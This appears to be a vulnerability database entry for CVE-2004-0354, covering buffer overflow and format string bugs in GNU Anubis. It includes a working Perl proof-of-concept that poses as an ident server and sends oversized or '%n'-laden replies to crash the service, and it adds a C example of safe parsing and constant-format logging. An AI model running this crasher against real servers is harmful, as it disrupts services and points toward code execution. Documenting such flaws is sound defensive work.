GNU Anubis Multiple Remote Buffer Overflow and Format String Vulnerabilities

Vulnerability ID: 1107762
Vulnerability type: Format string
Published: 2004-03-01
Updated: 2005-10-20
CVE ID: CVE-2004-0354
CNNVD-ID: CNNVD-200411-096
Platform: Linux
CVSS score: 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/23771
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200411-096
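|Vulnerability details
GNU Anubis versions 3.6.0 through 3.6.2, 3.9.92 and 3.9.93 contain multiple format string vulnerabilities. A remote attacker can execute arbitrary code via format string specifiers passed to (1) the info function in log.c, (2) the anubis_error function in errs.c, or (3) the ssl_error function in ssl.c.
|Exploit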
source: http://www.securityfocus.com/bid/9772/info

GNU Anubis has been reported prone to multiple buffer overflow and format string vulnerabilities. It has been conjectured that a remote attacker may potentially exploit these vulnerabilities to have arbitrary code executed in the context of the Anubis software. The buffer overflow vulnerabilities exist in the 'auth_ident' function in 'auth.c'. The format string vulnerabilities are reported to affect the 'info' function in 'log.c', the 'anubis_error' function in 'errs.c' and the 'ssl_error' function in 'ssl.c'.

These vulnerabilities have been reported to exist in GNU Anubis versions 3.6.0, 3.6.1, 3.6.2, 3.9.92, and 3.9.93. It is possible that other versions are affected as well.

These issues are undergoing further analysis; they will be divided into separate BIDs as analysis is completed.

#!/usr/bin/perl --

# anubis-crasher
# Ulf Harnhammar 2004
# I hereby place this program in the Public Domain.

use IO::Socket;


sub usage()
{
  die "usage: $0 type\n".
      "type is 'a' (buffer overflow) or 'b' (format string bug).\n";
} # sub usage


$port = 113;

usage() unless @ARGV == 1;
$type = shift;
usage() unless $type =~ m|^[ab]$|;

$send{'a'} = 'U' x 400;
$send{'b'} = '%n' x 28;
$sendstr = $send{$type};

$server = IO::Socket::INET->new(Proto => 'tcp',
                                LocalPort => $port,
                                Listen => SOMAXCONN,
                                Reuse => 1) or
          die "can't create server: $!";

while ($client = $server->accept())
{
  $client->autoflush(1);
  print "got a connection\n";

  $input = <$client>;
  $input =~ tr/\015\012//d;
  print "client said $input\n";

#  $wait = <STDIN>;
#  $wait = 'be quiet, perl -wc';

  $output = "a: USERID: a:$sendstr";
  print $client "$output\n";
  print "I said $output\n";

  close $client;
  print "disconnected\n";
} # while client=server->accept
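
Added example, not GNU Anubis source and not part of the original advisory: a C illustration of the defensive pattern for both bug classes named above, using the ident reply shape the script sends on port 113. It copies the user-id field with an explicit length check and logs it with a constant format string; the function names, USERID_MAX and the last_log buffer are assumptions made for this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define USERID_MAX 64   /* assumed limit for this example, not Anubis's */
static char last_log[256];   /* last log line, kept so callers can inspect it */

/* Logger: fmt is always a constant chosen by the caller; text from the
 * network is only ever passed as an argument, never as fmt. */
__attribute__((format(printf, 1, 2)))   /* GCC/Clang: lets -Wformat-security flag misuse */
static void log_info(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(last_log, sizeof last_log, fmt, ap);
    va_end(ap);
}

/* Copy the user-id field of "ports : USERID : opsys : userid" into out.
 * Returns 0 on success, -1 if the reply is malformed or the field too long. */
static int parse_ident_reply(const char *reply, char *out, size_t outsz)
{
    const char *p = strstr(reply, "USERID");
    if (p == NULL || (p = strchr(p, ':')) == NULL)       /* ':' after USERID */
        return -1;
    if ((p = strchr(p + 1, ':')) == NULL)                /* ':' after opsys */
        return -1;
    p++;
    p += strspn(p, " \t");
    size_t len = strcspn(p, "\r\n");
    if (len == 0 || len >= outsz)      /* reject rather than truncate or overflow */
        return -1;
    memcpy(out, p, len);
    out[len] = '\0';
    return 0;
}

/* Returns 0 if the reply was accepted and logged, -1 if it was rejected. */
int handle_ident_reply(const char *reply)
{
    char userid[USERID_MAX];
    if (parse_ident_reply(reply, userid, sizeof userid) != 0) {
        log_info("ident: rejected malformed or oversized reply");
        return -1;
    }
    /* The unsafe form is log_info(userid): the peer's text becomes the format. */
    log_info("ident: user %s", userid);
    return 0;
}
```

Building with -Wformat -Wformat-security makes the compiler warn when a non-literal string is passed as the format argument of log_info.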
|References

Source: BID
Name: 9772
Link: http://www.securityfocus.com/bid/9772
Source: XF
Name: anubis-format-string(15346)
Link: http://xforce.iss.net/xforce/xfdb/15346
Source: BUGTRAQ
Name: 20040304 GNU Anubis buffer overflows and format string bugs
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=107843915424588&w=2
Source: MLIST
Name: [bug-anubis] 20040228 Important security update
Link: http://mail.gnu.org/archive/html/bug-anubis/2004-02/msg00000.html